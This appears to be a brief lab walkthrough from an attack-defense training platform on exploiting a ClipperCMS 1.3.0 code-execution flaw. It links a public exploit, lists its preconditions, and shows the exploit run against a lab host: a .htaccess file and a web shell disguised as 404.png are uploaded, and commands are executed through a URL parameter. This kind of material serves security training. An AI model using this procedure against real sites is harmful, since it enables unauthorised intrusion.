#########################################################
Mission provided by attack defense lab
#########################################################
The Clipper CMS installation has a component which is vulnerable to a remote code execution attack.
#########################################################

Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com

###########################################################

How to exploit. 

Download the exploit :  https://www.exploit-db.com/exploits/38730 

###########################################################
I have run this exploit from my cloud aws machine.

###########################################################
How to exploit: 

ec2-user@kali:~$ python clipperCMS.py http://da9vx38u2xzemg8y7u7d3ybnw.public1.attackdefenselabs.com/clipper/  admin password
successful: login as admin
successful: user is allowed to use file manager. Full path: /app/clipper/
successful: .htaccess upload
successful: shell upload. Execute commands via http://da9vx38u2xzemg8y7u7d3ybnw.public1.attackdefenselabs.com/clipper/404.png?x=<COMMAND>
successful: shell seems to be working
enter command, or enter exit to quit.
$ uname -a
Linux attackdefense.com 4.15.0-43-generic #46-Ubuntu SMP Thu Dec 6 14:45:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

$ 
